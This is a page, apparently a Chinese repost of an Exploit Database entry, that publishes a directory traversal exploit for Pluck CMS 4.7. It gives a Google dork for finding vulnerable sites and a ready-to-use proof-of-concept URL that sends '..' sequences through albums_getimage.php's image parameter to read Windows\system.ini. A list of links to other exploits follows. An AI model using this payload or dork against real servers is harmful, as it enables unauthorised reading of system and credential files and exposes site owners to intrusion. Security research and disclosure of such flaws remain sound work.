Pluck CMS 4.7 – Directory Traversal

Exploit Database
33 阅读

作者： Wadeek

日期： 2015-05-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36986/

# Exploit Title: Pluck 4.7 Directory Traversal
# Google Dork: filetype:php inurl:"/data/modules/albums/albums_getimage.php?image="
# Date: 08/05/15
# Exploit Author: Wadeek
# Vendor Homepage: http://www.pluck-cms.org/?file=home
# Software Link: http://www.opensourcecms.com/scripts/redirect/download.php?id=167
# Version: 4.7
# Tested on: Xampp on Windows7
###################################################################################
PoC = http://127.0.0.1/pluck-4_7/data/modules/albums/albums_getimage.php?image=\..\..\..\..\..\..\..\Windows\system.ini
###################################################################################

last Exploits
Pluck CMS 4.7 – Directory Traversal的更多信息

Pligg CMS 1.1.2 – Blind SQL Injection / Cross-Site Scripting：
PivotX 2.2.2 – ‘module_image.php’ Cross-Site Scripting：
Pre E-Smart Cart – Authentication Bypass：
Montiorr 1.7.6m – Persistent Cross-Site Scripting：
YPNinc JokeScript – ‘ypncat_id’ SQL Injection：
WordPress Plugin Hospital Management System – SQL Injection：
Koha 3.20.1 – Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities：
Snortreport – ‘/nmap.php’ / ‘nbtscan.php’ Remote Command Execution (Metasploit)：